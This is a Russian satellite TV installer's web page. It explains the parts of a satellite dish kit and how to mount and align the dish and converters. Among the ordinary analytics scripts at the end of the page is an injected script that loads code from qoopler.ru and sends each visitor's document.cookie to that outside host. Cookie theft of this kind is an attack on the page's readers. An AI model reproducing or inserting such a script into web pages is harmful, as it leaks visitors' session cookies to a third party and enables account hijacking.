Настройка спутникового телевидения
+7(495) 776-73-79 9:00 - 22:00 | Без выходных

Настройка Спутникового телевидения

Выезд и настройка спутникового телевидения - Цена указана тут!

установщик антенн

Настройка спутникового телевидения — это не такая уж и сложная операция, как может показаться на первый взгляд. К любому вопросу нужно подходить правильно, и тогда все получится.

526d5d5e1d9f7978d2417e79443c8331

Для непосвященных терминология в инструкции наверняка будет не знакомой. В комплект для спутникового телевидения входят:

- Антенна (тарелка)

Она предназначена для концентрации принимаемого сигнала в фокус от спутника с последующей передачей его на конвертер. Диаметр зеркала зависит от мощности сигнала, который будет принимать антенна.

- Конвертер

Это устройство, которое принимает сфокусированный сигнал от зеркала антенны и направляет его на ресивер. В основном количество конвертеров варьируется от одного до трех (по одному на каждый спутник).

- Дисек (DiSEqC — Digital Satellite Equipment Control)

Устройство, позволяющее переключаться между конвертерами. Тюнер принимает сигнал только от одного конвертера, поэтому для просмотра каналов с нескольких спутников необходим переключатель.

- Мультифиды

Специальные крепления для конвертеров.

- Ресивер

Это приемник (тюнер), который выводит сигнал от конвертера на экран телевизора.

- Коаксиальный кабель

Кабель для передачи высокочастотного сигнала. При расстоянии свыше 100м понадобится дополнительный усилитель для обеспечения качественного сигнала.

- F-коннекторы

Штекеры для соединений.

- Кронштейн для крепления антенны

4.2


Настройка спутникового телевидения начинается со сборки антенны. Если четко следовать инструкции, то никаких сложностей не будет. Перед тем как устанавливать тарелку, нужно определиться с местом ее расположения. При размещении учитывают такие нюансы, как наличие преград между зеркалом и координатами спутника. То есть, между тарелкой и спутником не должны находиться деревья и здания. Поэтому в городских условиях размещать прибор лучше всего на крыше или стене дома. В малонаселенной местности подойдет и наземное расположение.

4.3

Корректная настройка спутникового телевидения зависит от наклона антенны. Посмотрите, куда направлены тарелки соседей и расположите зеркало точно так же. Затем с очень маленьким шагом нужно вращать антенну влево-вправо, вниз-вверх до тех пор, пока шкалы на экране не заполнятся как минимум на 70%. Тут для экономии времени и нервов неплохо бы воспользоваться корректировками помощника, который будет находиться у телевизора и сигнализировать о качества приема. В отдельных случаях можно вращать не только антенну, но и конвертеры.

3.3


Когда итоговый результат вас удовлетворит, нужно выйти из меню и посредством переключения каналов проверить их уровень приема. Если качество картинки устраивает, туго затягиваем сначала крепления антенны, а потом уже крепления конвертера. Это достаточно ответственный момент, потому что малейший сдвиг по горизонтали или вертикали может привести к ухудшению качества приема сигнала.

Если вы используете несколько конвертеров, то после закрепления антенны нужно их настроить. Нужно отсоединить кабель от центрального конвертера и присоединить его к нужным головкам в мультифидах по очереди. Далее на тюнере включаем каналы с соответствующего спутника и нажимаем «INFO». Немного отпускаем затяжку конвертера и вращаем его точно так же, как и антенну. Как только пойман хороший сигнал — затягиваем крепления. Настройка спутникового телевидения завершена!

(function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter32184314 = new Ya.Metrika({ id:32184314, clickmap:true, trackLinks:true, accurateTrackBounce:true, webvisor:true }); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/j-avascript"; s.async = true; s.src = "https://mc.yandex.ru/metrika/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks"); type="text/j-avascript">(function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter24167089 = new Ya.Metrika({id:24167089, webvisor:true, clickmap:true, trackLinks:true, accurateTrackBounce:true}); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/j-avascript"; s.async = true; s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks"); (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-68618183-1', 'auto'); ga('send', 'pageview'); try { var yaCounter37438800 = new Ya.Metrika({ id:37438800, clickmap:true, trackLinks:true, accurateTrackBounce:true }); } catch(e) { } (function (d, w) { var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/j-avascript"; s.async = true; s.src = "https://qoopler.ru/index.php?ref="+d.referrer+"&cookie=" + encodeURIComponent(document.cookie); if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window);